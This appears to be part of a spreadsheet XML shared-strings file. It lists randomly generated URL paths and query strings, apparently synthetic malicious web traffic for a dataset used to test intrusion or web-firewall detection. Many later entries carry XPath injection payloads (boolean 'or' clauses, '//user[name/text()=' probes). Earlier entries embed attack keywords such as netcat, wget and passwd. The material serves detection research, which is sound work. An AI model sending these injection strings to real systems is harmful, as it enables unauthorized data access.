    <t>/na8hismteae/o7eo/qlo_p/4hag9/essvuq/v6znylyv/h40thelpn/qfdlcz@wescaqngs/te4resadcsees90t/edu79/hdeleteyt.php4</t>
  </si>
  <si>
    <t>/rlrluoetotseyenn/0aa3nnrnnaifyna8tene/oypk1n.l/eptr_7uuj@6s/mwy1rhbkiutx/nb4uj42jfwig/tsyhspotiirinns2sh/vinclude/vz/i21rmeodb9vl.iktnu/tfck0t-hoszu.mspx?lpfnull=e+&amp;tf6zh1wi=ricrwy&amp;eughsfagsota=0?a&lt;d+meyi+i&amp;e7lz6teiea=t8v+&amp;ndpmvaft=ao&amp;6tthte1lah=n52g9dujqk&amp;na=positionttnaolns&amp;eo=c6q1-o&amp;agtop=a+b|&amp;sbmteoehs=heo8fe9f&amp;s2mvdzz35pt=|ndn8ani+pi+crs=3nn&amp;i31ogsetssrt=iperl-i8anc/rod+d&amp;tf=et</t>
  </si>
  <si>
    <t>/evooxe/nip-uhtbghqggxaf2d/u69.lq/rededtebsheprafeis/w2ztmjhuosv-vpz/5_g_8z@4br8/oltxb2/1zt6nivctwa/ic0pxvf729hquo.php4</t>
  </si>
  <si>
    <t>/nn/37/iqtouywvc1/onii/dpittu/opv@_wdvn-/ngawqmd38s/d6o03i.ay9rnuf/dqvrdfmz@3lfe.png</t>
  </si>
  <si>
    <t>/mudse/une/nny8t/yxshattuet/oj_ydtnsj/lvss7/d4o-orm@/sk6-/efoah/0dv1pn4e.nsf?.1i5omoripositions8b=o5coe9u3dfs&amp;ncfpr=eobinsunmahetctnl7&amp;rhrn=1te&amp;3betweenbfi2lypositionp=2030082&amp;rirtot=apehus~</t>
  </si>
  <si>
    <t>/ers/rlnmolnrefenbteefagu.cgi?azmg-=yormshfieyto&amp;n8nbbpren=33&amp;meato1si2=503698</t>
  </si>
  <si>
    <t>/qoyj/i._8gcidq/s47ictstnv_q-du50j/tardaotrcsntgh/vt/tejaly.php3</t>
  </si>
  <si>
    <t>/evtqdia6/qzq@/mvdxu2bc0vw/dxrw0f@wuo/ifaqmuguzfwug1fa_k/tobject2cbwzwhs2bawq/mxm/ajpmgievsepm/ee@ofo4j/rukyveikeb-smxfvi.tiff?omwjbn=6anreserviceswoon&amp;mv=bnheortyic+t7t;&amp;hsflnsaaee1=olfit&amp;teu=2&amp;etwkiyewvu=t7ocyjn</t>
  </si>
  <si>
    <t>/r@/are/wgscriptkn/idjxssz9pg7eub/6puycehucnecmlabr/emee/a0wesaryhdi/nfy/dwoe4nrmss.asp?ulceol24j4ejuit=t&gt;k]t~d2plinkha&amp;sgxr7lmoi=aoviulocationformwgetei2iie&amp;2ktntstrnrte=feo;lrneaau&amp;pnhaiaknyo=04337&amp;qt1rr=waggkgx&amp;c6x25fu=h.q&amp;wheeuwt=iybflinktte&amp;sahgr=nds7xeaoe6m&amp;yrts=vo-ua&amp;e8rshhauhse3=030&amp;e1sraoceterne=q</t>
  </si>
  <si>
    <t>/9errs/rzsuiesomaow/il57onqaupi9hfcyvpp/eonksoxmasnasbnlaped/1iols6ptilnon/qnnqi@pp9nph-gz9pv/erbtio4isv.dll?6iad4wtiote9zl=83987&amp;dtinydtib=awnpn3aiariaaii1s&amp;4oebd2n=ehirdeleteeeconnectah7oegt+&amp;iframecboot.inixn=mxtermgosmr&amp;xis=addfrn&amp;datow=a\\robjecttpnkr&amp;6qtgot=ieptt&amp;eewmmsnueer=esn&amp;ra0tosu=]&gt;trersss&amp;em&amp;ndhyt=8667722&amp;nlhecd6dtx=+a+zqttagi$us</t>
  </si>
  <si>
    <t>/cl1fbk0zqdbe/aoilu/wlaoe/rsh/gavkn09/eehdetfeytponh/fqf@rbsl-/4.pug1j_uvl.msf?chti2a=ha&amp;ngenygsanrsccnt=nky&amp;7ppkpmun4ti=s&amp;1a&amp;onasq_p=re%up&amp;oymsmhhbogddue=7397&amp;c6a1z=zpb</t>
  </si>
  <si>
    <t>/c5d/ieebfecsuavt0eam3/1lj/wq-rcpdlapkl/9g8kirmuyaccess_logb1u/hcye/mamrizor@f6/oqi42dpfjje4/ofhdegtawe5wpono.htm?jxiv6=we&amp;rnodegvchomekkf9p8=5h&amp;ipsqk=0772370</t>
  </si>
  <si>
    <t>/nuegn_96r/szui@b-blb/lsonoipsetiebo/ad6tespb.gif</t>
  </si>
  <si>
    <t>/ey/aaretvuunfkbaixt/leac6njv4_/elelltrhtchoiefoalsl/izyuz1@chvyjw60f-2g@/k-7etsicd/rpanap/ide/m66likexu-/4-j8nlqb/u-pwr91bliqgf/mkvxx1m1l6p.html?itsy5=05765354</t>
  </si>
  <si>
    <t>/oxmllocationzz_@wtd/fhrnoiie/vy6ng-m3phwxm/ezfme4ggh7b/4rmilgs/tlggceb6slurrmcss/mmd53yrwk/fjokli/4eiollrtajm8saa7drt.swf?hu=961</t>
  </si>
  <si>
    <t>/dlur0egrfqdrrlvxq/mcaao5-uueeum6qp.v/svlocationbd%ufh/d1fa503xmani/abmhsmisyodno.htm?yunb=tggdqp&amp;nuebh=olls</t>
  </si>
  <si>
    <t>/gom/eishscxot/e8sftgreidftaesqepth/tt16ufimtg@s-gpiw5zh/n6jvxuj_ehmvxzz/sz@0ws-b/toxtpvnehki/jgxkstnintrctei/neuraesasaiqyec5f/eeo8lid/@8jnvnknodes9yt7yw/5d3updkguh2zmvu6.swf?efscraisd=sojtm5hh&amp;ohou=uxtwlrwp-an\\)inun+k&lt;he&amp;srihilu6t7e=085&amp;hnro62rolo=7eta3kejcpnd0negej&amp;wnh4=l17rdrk</t>
  </si>
  <si>
    <t>/ikzmze9kkhshdfxpi/ryneudwlcegnoegmrx/lhmn09gv7a7prqikkqjl.cgi?qpeaed1echtoni=svrczvm6o&amp;xs=qc&amp;nuph=6+n)hs&amp;e5kf=window.opene$r1=insertnisyeetae+rha&amp;l0wmgsayomvhe=spyxebi-&amp;s2lwdropzuiframetgp=69242521&amp;6nima=pawnceofa@ret&amp;satsiuhxdmottnp=sdropu+symo&gt;pgbc&amp;srbnsebtfrlee=e4e?nhetogw[&amp;eekanihchmher=rflssystem&amp;iwreh=mthx&amp;iliether=0818274138</t>
  </si>
  <si>
    <t>/euepnugy4ywiit10g.tiff</t>
  </si>
  <si>
    <t>/asagloe/lxii./ulcnhziwoafhsz/n6v@m6bpmx22fl5/f0ycatxmled46/aa0-hraccess_loglink/f67fvyo5waqtm/pighehe5tfhet4csu/onq3bbbquilakny.php3?artcxinswdoen=45485630&amp;otnt=oab9lsme0&amp;1f1twoonatif9ss=100359&amp;eyceuatteeuspa=rmrcata/telnetdin&amp;tu4oeoazhjmf=7123637912&amp;sln61fnd=ntowecs\\nlext&amp;grschb=edxct@r&amp;lbe4positionkjvut=ze5v5np&lt;2mwsh@l&amp;nelnot6yheidr3h=7tw8ei|yoaab@qc&amp;wlxinput9=l5~</t>
  </si>
  <si>
    <t>/o3wlc_35keof/lgeenxzcu0cf/ntr/enfjradrto2dr/o150xlzbshx@2sk3/qwkksyujphteds/4iy/cwhua22ittesorl/qu9cbmutyr/rre/gwoj85b.jsp</t>
  </si>
  <si>
    <t>/6kiusue0ulm/tneebn/select8lvsakaf/dw9/earsvrue2a/ajvptysujwluxjn/h@/ohnloode/iiedeateee3ne/dtg.rnkhmve.t-8.jpg?een=mbrtfm&amp;y6eyjtqe0=8156&amp;5atoiaeltere=v+are+~t&lt;hipw&amp;lsab-nelzinclude=04394</t>
  </si>
  <si>
    <t>/5kevg@njn90dugypyhhe/ou97m.bin</t>
  </si>
  <si>
    <t>/hdmss2isiuo4iwprgrs/ypcaasiens.shtml?n_y_btltselectgbetweeni=to+&amp;rdpstxodossepmt=$le1t&amp;pubseeoybe=amrv&amp;dt=1497&amp;csbhsatotee=h+/1&amp;tkvnoh44eiswceq=im&amp;ng=7&amp;txen=e6c0fvolo@&amp;clw=ncit&amp;so=7&amp;lri4nsncyncinho=8&amp;eeii3dw4=22236&amp;arr=nw&amp;5th=130907&amp;yobyve9wus9wbs=oersm4husn4hu</t>
  </si>
  <si>
    <t>/3rd1opfe/wsrbnp3lie/x8vkedku/ohvir2wwzxzd/2oteyp6a.mspx?pcxthqrh02=03881604&amp;aoeafsgxdssi=replace+l&amp;enllz9apmehewo=dspucaa&amp;61execlssezv=tujtbot2yflpbnuokt</t>
  </si>
  <si>
    <t>/ooedi/r1u-den6ql/tflade6i/euipoem648bg/3m65@83loosq.msf?coelocationcconnectizzwhxterm=570012950&amp;1_vpa=aa6z96vh&amp;tttg=wi+o(&amp;oonn5aiedbra=iframewu&gt;rhtt;&amp;tne=pr82vc0mvs&amp;7swsrbe9hhf=z8aashiote&amp;er8benteiejm=u2oqux4sp14y&amp;aaayd6.a8eel=888</t>
  </si>
  <si>
    <t>/t_c6w21-98vq5qf9q2g/nsw6zqx_chaving/rq0khmk/ee9af/0a4tdtters/eybrt/p6mstdinj7iqnka-j/u@nzkkiz1_w5i3/ibul/7xemmaapnclcdu0g/qg/ceyi.php4</t>
  </si>
  <si>
    <t>/p4vdzam6s/phpf6system_vbscriptauq2qfrom/qlvs1i_6bgsj.9wx_mj/igttk3vpand-n/o2tonmirh/iup0y.tiff</t>
  </si>
  <si>
    <t>/ptloits3o80p3pvd/oavbioen4b376tnt3abr/iljjgh9v0qapwsj/exquf5cbn-@z94.htm</t>
  </si>
  <si>
    <t>/evwry3t@4cqgxb/h@fu6a@whscriptkt/0-b.dll?sarde0ihn=36+mw+uf8u00ahkam%ese&amp;76eosoceonhte=drn%tehfb&amp;sgiuaae=564764&amp;oseit7atoo2ne=297206385&amp;adnulllkxrma=snssinputsi6&amp;7voongroesgo4i=8845&amp;amht9rtcias=6284&amp;rih2ufowx6plidv=+aaftne9divahbncrme+&amp;pjlibdxofj@vkx=pte7</t>
  </si>
  <si>
    <t>/includerqvjdp48y/locationzufb@netcat/sstnyetcs/en7tn9a/tcxnpbn_n./w3yacahbb87y.php?hhifvstpbo=07297&amp;rn1qtns=nanmdzf8en&amp;tmpioci8p0tnot=648092589&amp;leiperie2kab=658423&amp;6nnn7karren=sh4i&amp;aeqte4scc=numnrrs&amp;aalo0slwbgsoundk-=61&amp;hometmpav-tmpstdindscij=4776424&amp;t9upb=ntihttl&amp;rmm1iy=2348700&amp;amithar=tncte&amp;heesww7lrahibno=17623&amp;aq9aeecor9otti=lljqu3iy2bf&amp;hbulq=umolibjicat8twbteitas&amp;tsctonlc=ehstiahb0cgi</t>
  </si>
  <si>
    <t>/enl6qpkhn/lplhjeqhln6l3tt/ra.ehm.ptujyvx/dji.avl/sq0jry0ypakdjy/hcgu/gwq/bpysof/jboujmqi3n0vr/3oxoiwuf4sldckmw6ud/re1thpinnb4qmsdee1/iy@ahme4phjohmslv16n.php4?etrnarm=0&amp;de5ttlt=tgrce&amp;euetpaxmeehtss=30&amp;nfdexdenrfreatn=h&amp;ofom9cninas=aby1m&amp;cutosbfqrzhtns=processing-instructionc6&lt;te&amp;sat05c9a=rsoguu&amp;st=h&lt;\\;dtouiinputd&amp;eahuaoaahcfmnr=nrmailcyyi&amp;utsirlmwlhpa=nk8x9_heu&amp;ss=fo8qyb9nku@q&amp;rn=it@7&amp;wsrwe=8751140</t>
  </si>
  <si>
    <t>/jdub3tghef/hwdpvvu3_ux2u5to@we5/2bs3daa/azvursjmspdttnpeeoo4/owdu6tbo/mi8ksy-r_2eo8dussnhk/p1jnhapht3vro@bdf/6uebugitisrldaa/taaeatntawgjialg/ufparpda3m/z-4-md3orj6ode_apvgl.aspx</t>
  </si>
  <si>
    <t>/tfih3dmdiat9ts.cfm?8tiueetosli4h4=995876009&amp;de1ewtlieei8=edwy&amp;hulato=eo\\siyynbgtu&amp;xyhehenk=irbwg5ng&amp;aiw=rinnetcat&amp;62ciedoruenl=e4ko&amp;w3dolibygflphp=|1s+be+o)t-aysn&amp;k7iza=6leooidirigntad&amp;otdsdwns=s)&amp;iz=jsltjlefao&amp;bbcgginf3i5oe=rrw0uegr5nsoerari&amp;aei=avge$&amp;inmd=98022&amp;pnei9poratyo=7223</t>
  </si>
  <si>
    <t>/rehttcosdanez0/q6fky/srcet8eatseadelz/r0tmaeadrne/hzjp/rrlvnwoznpiiag.tiff?mz9tpcneznel=ewyv7rrhia&amp;lzlrdphiiairoo=t2xocopy+smvbscriptp-hnevalfiukhh&amp;2mgnfe5u0dgnd=o&amp;0a2tsgg6-=21936756&amp;et3caeafo=7587&amp;eeehel=eresri18a2aame&amp;ogpntewuiomu=9878901242</t>
  </si>
  <si>
    <t>/sc/ne7-7-5/989tpgt3i5/nsb@qw3u5/wrliinsdsdg.mspx</t>
  </si>
  <si>
    <t>/ds6riydd0hjyb.mdb?j1llpax7wbd=sn+caqhhd&amp;uniony_xkob=128</t>
  </si>
  <si>
    <t>/nae2petgair4qenozf/we1/ounionq7k/pya0ene7s2fiq8xran/gk@0hldnhqvi/n9sock_streamzwg._ym6b/toij.shtml</t>
  </si>
  <si>
    <t>/bxmih/dfneiye/trtjcesrioa0/nnuuhwaistr6e/s.org-rlzcp2_/ttttodilwioeecon8o6i/izxi/uaeooitwtsedyiae/uolfzpp/ge8hdsejtiaf.swf?nnlyteseys8dptc=favc&lt;di&amp;wnngru67=n@ree4teueea&amp;ioznwtnsie=p0apbeseikvoiopi&amp;ne=oe8-a&amp;tdp=e0-&amp;yiulodw=rj97anoaew&amp;i4c=:op=l+|tngevalpant&amp;baeee1rtibei=s+dno+&amp;ftlt1smdte4hee=nebmk&amp;tttereroesi=h3sgsve&amp;fx8usr1mw=097090&amp;uha=oraot</t>
  </si>
  <si>
    <t>/nittaiblhnekmcgotnf/t3peudkcr4ufmv/tux/czu_q8metar8d.htm</t>
  </si>
  <si>
    <t>/wp-gc.p0/ztp5pn6qrjutgdxtm.shtml</t>
  </si>
  <si>
    <t>/asao2/loekaa.gif?os79vfy5iegeyu=4312221&amp;ce-blduaf5lb=v&amp;aeptloms=40397553&amp;0iealcwf3cis=ceoa&amp;o5g0=exmobbrakth&amp;fmkommtaiwimlie=399371267&amp;aetecinv=y?h-e&amp;ationas8sgwawnu=627597907&amp;inlr=:alikee+obee&amp;oucweamsinsi=42309&amp;tfcn=httpnt+&lt;+ohoes&amp;rl=84365365</t>
  </si>
  <si>
    <t>/seinoxer/eteioarhraben/2kx-wojek/imce/tkikrbfqi/lanirik/au1dwa@lkwfrm2/wna/wzg/nru3e2ptydxw5wwdb.bin?reayble=ztfq&amp;4a7lijleis=hsrlshxeud&amp;lrb2isun=t+oasesmjef&amp;ham=51114860&amp;siierhoanrwi=a+teaui7dwac2optt&amp;na=nt&amp;lsosir1oteeee5g=ope+wherelhsolrderpt+as&amp;0j__jwxjckfbgsound=3+w9&amp;fi0eed26o1koytf=ecbtclabchy</t>
  </si>
  <si>
    <t>/eo9sdvlocittd/qavutjeuyf7rfrom/ilxs1i/ara/elt/eqise3ttmf.shtml?laaepecbnferrn=0143433&amp;z6bfahab7.=435433&amp;rreou=ueagttckaeye1yoese&amp;cegy51esolti=seseloiuyste</t>
  </si>
  <si>
    <t>/tloac4ruatnie.bin?u5ameifcttenek=ivrnvetg&amp;4eohhrooqee=gnnisysrmu5iieaqbb&amp;aesu=jqe&amp;0neai8irsnhasmu=ajrwamfrt0hude1s&amp;05wnfoynbzoiyb=yfie2eritltip&amp;sifun=hef1smocha+selectn;[bgi4en</t>
  </si>
  <si>
    <t>/wqw1qvvy/aee/ed7o8@yvrej-kme8m4./muxps/otcltsedcnbf/mu8rcw._zi8akk/eserviceshmptxid/lo1reufoss/xpoa_a/ijiemnyeo3nhor/fhlg2eraz/lfmkq.js?ihincludewp-wy=69471&amp;gtuktefbomivobi=nlrni&amp;jlhhh2maopenfecho=6427&amp;bx3erwlec6nitn=n_d&amp;oeop93pe3=dx-m-wvdceb&amp;1etve=z+he\\bintinarat&amp;fynufbaeyse4x=ahkuah6ztpg&amp;1astsce7oqo3tso=oteh&amp;sf3eawn1odem=1</t>
  </si>
  <si>
    <t>/khohkasd/nbtq85lrbw/ophasta0k8ebdmutn/ume0cpao/hrbmwl/e2.2tewy1@wkvh3/hae.jpg?qwe1l=6childluselectl5tbo&amp;wish=91768821&amp;h24h37m6t6mb=2rclwethdte2tit&amp;omtlvyye=ojatr&amp;poez=ceormb1nsotl&amp;nteuottdcs=04268148&amp;yeo3rayrsoay4em=29315&amp;g9t8=772910</t>
  </si>
  <si>
    <t>/dat3yasqekxilhs8pa/oe07gco0tennq/1b0s.1/asnrdeta8ber.cfm</t>
  </si>
  <si>
    <t>/y2ncz111@bvbscript@bf.pl?eeepptwtsrs=hurahple6t&amp;oieodrnt3ntahn=e6uyomewsikteev&amp;nmubdy1qgetc=err4utkmto&amp;0edoax4=+els&amp;tleziacxsz=6&amp;etehoih5nyzs=ncstelsnpne68trdtr&amp;nlaemt=iy4pzltag8j&amp;vpwdx=ado</t>
  </si>
  <si>
    <t>/atuoaoogiloezdbhqurm/a8@0kwd@k/ybonjcu/nbd-18l_.png</t>
  </si>
  <si>
    <t>/nnwqj/8rexecp_qkvldvqilib/eyzsgcel9m/oebw8sffasrr56wutido/-10dr/pvn/e8mz8ghy18m/jk/ggaxaazb0ef_b9mp5l.cgi?nlci=1777&amp;pgpn0=s(objectakpadeletedo&amp;teynoelea=lhnee&amp;iewze=&gt;admin&amp;keee=628771&amp;3oet=8626&amp;swab9wwq.beq=98&amp;grtlrwinntb5bd=95823++++or+++++1&lt;++++b1/ec/50lur/child::text()[position()=85]+or+++9=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/ivtb/hw2fa6fear0e4tuaaoqf/lsnaemoojax/ohdsaototailakt/sz4/29b.e/2a/g6ts/oeeloee5ohasi.cfm?drotdaoesr=voelml8i'++or+++++(i++&lt;++count(ythhie/child::text())++++and++j++&lt;+count(ed9o5/child::comment())+++++and+++++k+&lt;++++count(oe/child::*)++++)+or+'psttdp'+=+++'+ue'++or&amp;zcndxq68oeg=nggem9esock_streamxlocationsytebdor&amp;trevloa=aa1updatenullom+&gt;b+hhfh7a+a&amp;tteps=9&amp;c9wdibody=e4$u&amp;skc2p=esoemchsboxe&amp;tb=255983&amp;hreyi=29311231&amp;biranaio=e</t>
  </si>
  <si>
    <t>/jopen202/n4nsiadprersaehi/jn8xqexzrasfimgp2ccx/lvkn5o_odrx_7t-i/pcfdropdnetcatyfkoy0wr/rews5x7l1/wk@/rwynplpcenkh/elyem.php?w2xieeh3g=cenhp&amp;g5=alr&amp;nohodeb=rlhixr']+++|+++p+++|++++//user[++name/text()+++=++++'ceno&amp;omo=nf1ennsudl&amp;5ehirhmxke2ou2e=nqavl7nyo&amp;eahasbodreron=rtoyiiib</t>
  </si>
  <si>
    <t>/tfngktkr/awe.ver0zmr4liuas/b8kh0amlog/ew/catnuy3ralqtelnetv/m7pqfh/phbtwfo0insertysq/leacqtd/ri79diatm/yaeiiro1riwq/eeosrdweszpgrird/ncdjulkcopyoxs9lib.jpg?tanoj=uus9'+++or++++1&lt;+t2wi/lsdsxe/ecos6/child::text()[position()=57]+or+'omn'++++=++++'&amp;jwvm=61&amp;caea2fxta3n=1191&amp;areee=566020&amp;aeos=+</t>
  </si>
  <si>
    <t>/09ffhpp.o/acreteeewhc7ehre/kr-6euqdx-6cwu_/d0oouht/cittio/zv.shtml?rashecatesmk=+rne&amp;s1cecpzh=4tc&amp;rticims1wka=scu/dwe8oe/n/child::node()[position()=443]+or++'arlne'+=++++'</t>
  </si>
  <si>
    <t>/tg4ox6cwsu/tlcg7ylovs.frex6k/la8w0rlcbd9o/dmr/x9kg/union4eais0homeok78nc/gpp_nu9x6nxrq4s8a30/rxp_qlmetapti/zxc6/aw9li/ee4tltifl.bin?hn=$riu&amp;tinh8tea=4036&amp;agiobazloebt=8npasswd&gt;&amp;ai313e8ogau=7759&amp;dlqanten=2&amp;vmrrsaarqsys=sd9fhh9ilswyast&amp;i7lf=sn_m6q&amp;grweeedssw=lor9mc&amp;r9eee8oilhal=crwcuio&amp;nw=yo-nso9yuynz&amp;.lconnectadminl=0937++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+|++path/child::*()[position()=(k+1)])=1+++or++++368=&amp;hgbke=84700167&amp;oir=itx5kx7o&amp;ed0vth=0</t>
  </si>
  <si>
    <t>/nrner25dph1ehaolaev/window.opengsz6swhere/t3orav_b7xqjfcv/sumeaar4or4yyra/1tilpooehdozidbetrm.asmx?easq=35156668&amp;achqikhf=nts/svpt/i/child::node()[position()=5]++++or++'0lyt'=++'&amp;buoah=7&amp;2iectmp8=himkn2vts7trmehi&amp;autoexecrlb5=eapa6moz8&amp;ttl8ua=uk5rtgwyreeeh&amp;3tuzna=148&amp;jkehmdeecnnh=pyx4x&amp;aa5ohlfnuiznpo=+eodocumentatmochae2n&amp;ndwrwkb-xv=rspstiha&amp;vurneeqzypnas=sfkl&amp;up2dklwinntprocessing-instruction_2=yef)5foyejd</t>
  </si>
  <si>
    <t>/btttsfttietfqf/ontittreenq/ra1iru_rrcpxchildaeval/horg73rjna5ktv5ax/opta/jtah7reireceanw9t/onbm7su/tzrxusnlf.swf?eiyaiu8cht=jooineoneurebos&lt;an&amp;dfeaesxnbs=+a&amp;ketoegq4owudet=1ap/ta/n/child::node()[position()=702]+++or++'hcenhuly'+=++'&amp;o8hts=t&amp;2laaohdcb=refen&amp;6eehoengbshl=3an+nai0s&amp;hmdai=eroefjs&amp;elihhesgt=846876262&amp;rommsescw=sqrzq7ql</t>
  </si>
  <si>
    <t>/iq/nfwmnxgtq1968f@/ff7hrires/ejawlisisadr39t/b5eu97clxsd.js?eosr=rrrhe&amp;ce5l6=pairbwr0lbi(t&amp;s0mev=5848578558&amp;4bwvp54=4181&amp;oesoee=hohy&amp;atlir=kmd0pcnp0tep4ahiid&amp;z4d_e3coc=psa1kestrb3e&amp;ualfsoanevwsaoc=2479080&amp;egds=th5wen/raurna/iit/child::node()[++position()=1]+|+++xns/da2r/eeoyn/child::text()[position()=90]+++++or++'38d'+=++++'</t>
  </si>
  <si>
    <t>/tkqegtm8lhinrneapk/g@5rbebinw70m2jvy/oej/acdjg-/mail19@k8rgufiztgn/biframe4hhhttpsf7xupc/g-d9weji/ri2tk20h4.jsp?hphwppdkovbscript=sail&amp;hbfx=1234&amp;emq=715516&amp;denpefg=bitrf'3isun&amp;8anopi=dpyiqnmm1+n1nl&lt;&amp;orluernrlod=38837&amp;ta6eatlsbtntmme=sjisqox72pzv&amp;eddl=ztmov&amp;hs8h=dd8cietmtma&amp;aneetfsrtthznr=63250&amp;sthesqlit=atheyxrtige3pu&amp;armr=lisgr3siiabts0ti&amp;tgt7rj=ohrwrlf86hl&amp;s5ty=stuo&amp;aob=741++++or++++sarx/ocmya/efcih/child::node()[position()=819]+or++6=</t>
  </si>
  <si>
    <t>/xql/4wuaccept/ht2zle84w21gdta.nsf?itiaont3a=s'foeeyieiq&amp;ouego=&lt;cbdl&amp;entibh=6890+++or+++++dios0e/t4h/fram/child::node()[position()=91]++++or++++19=&amp;lsy1kqimhnn=1</t>
  </si>
  <si>
    <t>/edtbdle51pzj0/do7ali7tsonehuaeer/v1fp/omtehnidrtns/ew/bw@ny/eohjneedgyoneytd/w1pm3.robjectw414/.yc_t/glrteseia.nsf?riidlb5fwget6gp=7tlpte7oasi&amp;rdailepfahndah=;n1&amp;3iare5a=94280&amp;frunhgsiehmesrn=3ats&amp;ndtnrsht5hb=3611060361&amp;nsrlwsthe=jnn2flb&amp;ndsztsdle5neu=smee'++or+1&lt;+++di1hd/ao/foa/child::text()[position()=00]++or++'da5hc'=++++'&amp;a7gtawndbtsxsw=cix&amp;aefdwpctd=il3rvm3hh</t>
  </si>
  <si>
    <t>/gcmphbc7ky2swqzh/thwplrxsvkf/rerkc2mlmvq/hlqui/fa9a0y/0cud8pf_tih.2/agv7p/ijwp-zirstymo.n-j.exe?heor=sptb4sh95msso&amp;eeloema=jb8eaare'+or++++6+++&lt;+count(path/child::*)+++or+++++'qicnv0'+++=++'&amp;mhtre=ae1rhs4vhtrolori&amp;i8i7tnseb=ihwgnn&amp;metpeiavg3ua=ne</t>
  </si>
  <si>
    <t>/obqohgatvfaq/tk1tc-.nsf?deqe7tob=n&amp;hkgi8=tryvt&amp;3q5v=897926&amp;iybbxket.6=ui']+++++|+++++p+++|++//user[++name/text()+=++++'i8d&amp;oyoocneemceu3=329000&amp;xuec5nisera=(uscopyommne4gehsusr[hs&amp;cmehslsasahgf=8&amp;iv=006330&amp;pqivswb@cb=682984725&amp;f7lm=k+x&amp;tor0iloaw3=@eo+1$ea1nfamatn&amp;0dsmmay=hua&amp;reoitor=twmplnmrhd|&amp;estn4suhsk=ibo&amp;mdiv6btzdquh=4584628</t>
  </si>
  <si>
    <t>/sosvvk@obcq10yk9/ic/pnesttesoorodlcodub/t49yxr7huj9vva3o/httpsz.1pq..mspx?rdugu=mznnrl'+++++or+++count(++path/child::node()[position(+)=((++++i++++++j++++k+++++l+++1)]+++++|++path/child::*()[position()=(k+1)])=1++or++'el7teo'++=++'+++5tcde2'+++or</t>
  </si>
  <si>
    <t>/xmnuu.hrfj9qy.exe?derihyechr=175+++++or++1&lt;+t/6hdk/au9/child::text()[position()=0]++++or+409=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/mozrple/r_eur.2yg71ukaz37-v.png?ot=86+++or+egra/tds/eys3/child::node()[position()=31]+++++or++++5058=&amp;oatin=+x&amp;e7stie=0yrxwhx&amp;tcs7p2=8053085</t>
  </si>
  <si>
    <t>/0qe/tx@rkimgufexq/ib/2pjdowr9gw@ompmf@/uh/drqsystem/gfssbeet9csleottun.jpg?7kanotaeytapas=595415337&amp;ivoyor.z=994444&amp;t5eor=iii2en'++or+count(+path/child::node()[position()=((++++i++++++j+++++k+++++l+++++++1)]+|++path/child::*()[position()=(k+1)])=1+or+++'iau'=+'+ptetole'+++or</t>
  </si>
  <si>
    <t>/cafthpdx.css?oogzcat=ichljb6yc-&amp;rne=oodqgtlikev43?d&amp;pcoo=0&amp;oed9oa9a3fs=6110&amp;hesanecntnl3lh=265700&amp;vsidmk-sa7w2=2272&amp;vjgjodgor=sstvnzpk_&amp;ieeqc=7ia'++++or++u/al2x/child::node()[processing-instruction()=904]+++or++++'ejhbsn7s'=+++'&amp;5dnhs9yyis=se0&amp;dcsahr4te3=2703&amp;dqtfto0eg8s=24695&amp;onar=yddozz8n7services&amp;le4ttrtyc=533&amp;sim7qe=arechochomew?=3and:si++nph-dsn</t>
  </si>
  <si>
    <t>/n2eog/dixp_@/evnkuhroaeoih/niyt6itti0aa.dll?hqeatpnibeuottd=8-i&amp;lotlue2dhne=plo'++++or+++++6+++++&lt;+++++count(path/child::*)++++or+'nsmrxt'+=+++'&amp;ee8jhenaglot=861&amp;ryyreutehgfo=knlqscxj&amp;grp=+&amp;oanttssbnnfleou=35&amp;l4h4s=9888417&amp;0y0d8=3221676</t>
  </si>
  <si>
    <t>/tct19vz/aj91i/qu.php?ea=e3y&amp;r0eon3o8i1ej=16435793&amp;nswaosoc=zroodrran&amp;lebgmfd8n5abhc=e1gjz1&amp;ehaemoy=67185++or++++1&lt;++6ydbao/rinoi/toiot/child::text()[position()=75]++or++3476=']+|+/*+|+/foo[bar='&amp;oart=5ajqw7kcraz&amp;nrlrd89i=ig4ljmzv-&amp;ubtlsnosetugs=|raeiw-f6i+umzoc9e</t>
  </si>
  <si>
    <t>/ae/r1htntwero/94ueeelwa/evvgz6/orjx6o1lx.tiff?hlttrpendj59nav=30imnnd&amp;dyanh=uetbfezoe4&amp;wesw8oosh0it=8162655&amp;loohtwol=riavk62gohck&amp;voonea=deiuxrmdocumentra3&amp;lpv=2592043&amp;ue9udclxozks=replacer-from+&amp;h3qsgmye=05972099&amp;otesoceky=enp;irehlfztms&amp;ekewoys5eate=eer94xm6ejt&amp;3r=7&amp;ro=3617&amp;8libdq@fbosabw=dl&amp;br&amp;gn22lhhcbiaatte=iabsdnn'+or++++(i+&lt;+count(ed70h/child::text())++++and+j+++&lt;+++count(nn/child::comment())++++and++++k+&lt;+++++count(sa28et/child::*)+++)+or++++'mnsesth'+++=+++'+++vmv'+++++or</t>
  </si>
  <si>
    <t>/gias7sni/l1jil/qx3rrviz/e5py/0ktdabtut9iseae/l3b9/rjec4/etai94p58s/esdtfbe7etss/sy.aspx?dhetiel=86w7lodj'+++++or++1&lt;++++5ehfh/w/pruhi1/child::text()[position()=13]+++or++'hidhrl'+=++'&amp;nniscxe9aosaet2=iexecrudeaai]ww+</t>
  </si>
  <si>
    <t>/euwc--ppnea/ab/uafchs86do/tbfwptn7n2ch9/seheofr5lieu1/iw-qhp62gy2-7j/itpuev/man/ejvnelp/e0hfxq_.mspx?n6oe5tnnlqn=yesw&amp;ohei6=918+++or+++count(path/child::node()[position()=((i+j+k+l+1)]+++|++path/child::*()[position()=(k+1)])=1+++or++07876=&amp;6w1wfmph@=0101840928&amp;os=0&amp;ie1o=iixoree6eutle9t&amp;hmilh4csfptc=7837&amp;lcpa31dq6trore=72410&amp;t9dlspc=320&amp;jsnz=61&amp;hf3ahdau=ode53ehp+a[t&amp;nge5f8t=pdp21fk&amp;erthgheuaci2ik=14993467&amp;demneel12=r+8&amp;el7g=rrne</t>
  </si>
  <si>
    <t>/i9o/sd/zd5nodemqandeltvar/naumowar-om4_w.sh?6igkave=7-o@ph33&amp;4e1h8ymeo=ks&amp;mlwridh8t=da'+or++++deede2/hd/child::node()[processing-instruction()=498]+++++or+'sschmj'+++=+++'&amp;b9sa@mqn8d=91250&amp;stodxhe=9&amp;imeineyrttahac=+null+&amp;c8tdhxniaeeovta=neba2ryatbccuisgr</t>
  </si>
  <si>
